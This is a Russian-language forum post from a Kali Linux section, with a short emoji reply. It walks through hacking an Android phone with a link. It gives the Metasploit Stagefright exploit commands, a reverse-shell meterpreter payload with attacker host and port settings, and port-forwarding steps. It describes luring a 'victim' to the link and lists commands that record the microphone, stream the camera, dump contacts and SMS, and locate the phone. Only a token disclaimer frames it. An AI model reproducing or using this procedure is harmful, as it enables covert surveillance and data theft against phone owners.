Загрузка...

Взлом Андроид телефона

Тема в разделе Kali Linux создана пользователем lleswatn 23 дек 2023. 1069 просмотров

Загрузка...
  1. lleswatn
    Кому понравилось (1) Скопировать BBCode
    lleswatn Автор темы 23 дек 2023 Заблокирован(а) 4 28 сен 2023
    [IMG]
    Взлом андроид телефона с помощью одной ссылки

    Приветствуем вас,сегодня пойдёт речь о том, как в теории можно "взломать" андроид при помощи ссылки.Нам понадобится Kali Linux, желательно на виртуальной машине,*** сервис что бы пробросить порты.

    ДИСКЛЕЙМЕР:Мы не несём ответственность за ваши действия! Статья предоставлена исключительно в ознакомительных целях

    Начало
    Ниже будет расписан гайд, как сделать это при помощи *** и виртуалки VMware Workstation.
    1.Открываем порт на ваше усмотрение, настраиваем ***.
    [IMG]2.Если у вас уже есть тачка с кали, то приступаем к этому шагу.Если нет, то создаём её и настраиваем.
    Теперь пробросим открытые нами порты в виртуальной машине:
    переходим в Edit-Virtual Network Editor [IMG] Нам нужно настроить NAT.Для этого нажимаем "Change Settings".
    [IMG]После этого, нажимаем на кнопку NAT Settings.
    Перед началом, вам нужно узнать(или вы уже знаете) IP вашей тачки. Для этого запустите её и пропишите команду в терминале: ifconfig
    [IMG]
    :finger_up: Теперь можем выключить машину.Возвращаемся в настройки, добавляем 2 правила, для TCP и UDP протокола соответственно. Вписываем открытый нами порт в "Host port" и "virtual machine port".
    [IMG] :finger_up: после того,как добавили 2 правила для TCP и UDP, нажимаем OK
    [IMG] Теперь перейдём в Kali Kinux.
    проверим ip вашей тачки командой ifconfig в терминале:[IMG]
    Откроем metasploit командой msfconsole[IMG] Ждём, пока прогрузится.
    Теперь прописываем в терминале следующее:
    use exploit/android/browser/stagefright_mp4_tx3g_64bit[IMG]после этого, прописываем команду с вашим ip тачки:
    set SRVHOST 192.168.137.128[IMG] :finger_up: set set PAYLOAD linux/armle/meterpreter/reverse_tcp[IMG]
    :finger_up:
    прописываем IP от вашего ***:
    set LHOST {ваш ip от ***}[IMG]
    прописываем открытый порт:
    set LPORT 2235
    [IMG]
    теперь прописываем команду:
    set VERBOSE true
    [IMG]и наконец, запускаем эксплоит:
    exploit
    после этого, у нас запустится сервер:
    [IMG] :Ktonahuy: ВАЖНО!
    Теперь, берём IP адрес от ***, добавляем к нему открытый порт и получаем "вредоносную" ссылку:
    http://192.168.137.128:2235 - так будет выглядеть ваша ссылка

    После того, как "жертва" перейдёт по ссылке, у вас откроется сессия
    для просмотра всех открытых сессий, вводим команду:
    sessions -i
    для выбора конкретной сессии, прописываем:
    sessions -i {номер сессии}
    [IMG] :finger_up: после успешного подключения, вводим help и смотрим доступные нам команды.
    возможно, сессия будет закрываться при попытке открыть её.Значит версия андроида не подходит под сие дело(надо версию ниже
    !!!
    С помощью следующих команд можно производить манипуляции с телефоном:
    record_mic - запись звука с микрофона
    webcam_snap - скриншот с камеры
    webcam_stream - просмотр видео с камеры
    dump_contacts - создаёт дамп контактов с телефона
    dump_sms - создаёт дамп смс с телефона
    geolocate - отображение геолокации
     
    23 дек 2023 Изменено
  2. Satori_ty
    Скопировать BBCode
    Satori_ty 7 апр 2024 1 19 ноя 2023
    :pepeshock:
     
    7 апр 2024
Top